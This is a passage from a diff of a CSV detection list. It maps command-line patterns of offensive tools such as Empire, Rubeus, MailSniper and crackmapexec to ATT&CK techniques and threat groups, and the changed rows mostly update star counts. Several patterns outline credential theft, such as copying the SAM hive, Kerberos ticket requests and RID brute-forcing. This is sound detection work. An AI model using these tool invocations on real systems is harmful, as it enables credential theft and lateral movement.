complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "* -remote -bindPipe * -bindPort * -security*","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" -"* -Remote -ExchHostname *","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","0","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"* -RemoteDllHandle *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Remote -ExchHostname *","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","0","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"* -RemoteDllHandle *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -remotefilepath *\\*.wav*","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","0","N/A","N/A","4","340","64","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" "* --remote-impersonation*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "* -RemotePath *\Windows\System32\SAM -LocalPath *\tmp\*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "* remove device GUID:001B2EE1-AE95-4146-AE7B-5928F1E4F396*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" -"* renew *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* renew */ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* renew *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* renew */ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* repo -u https://github.com/*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" "* req -username * -p * -ca * -target * -template * -upn *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* -request -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -request -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* -request -format hashcat -outputfile *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* --requirement *Exegol/requirements.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* resolveall.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* resu ten*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed net user","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rev_shell.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "* -Reverse -IPAddress * -Port *","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","0","Invoke-PowerShellTcp args","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"* reverse_shell_generator*","offensive_tool_keyword","reverse-shell-generator","Hosted Reverse Shell generator with a ton of functionality","T1059 T1071","N/A","N/A","N/A","POST Exploitation tools","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","2271","510","2023-08-12T15:06:21Z","2021-02-27T00:53:13Z" +"* reverse_shell_generator*","offensive_tool_keyword","reverse-shell-generator","Hosted Reverse Shell generator with a ton of functionality","T1059 T1071","N/A","N/A","N/A","POST Exploitation tools","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","2272","511","2023-08-12T15:06:21Z","2021-02-27T00:53:13Z" "* reverse-index.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -RevToSelf *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -RevToSelf *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* rexec-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rfc868-time.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -Rhost * -WARFile http*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -Rhosts * -Password * -Directory * -Dictionary *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","HTTP-Login.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -Rhosts * -Path *.txt -Port *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Find-Fruit.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Rhost * -WARFile http*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Rhosts * -Password * -Directory * -Dictionary *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","HTTP-Login.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Rhosts * -Path *.txt -Port *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Find-Fruit.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* riak-http-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --rid-brute 2>&1 *.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* --rid-brute*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation 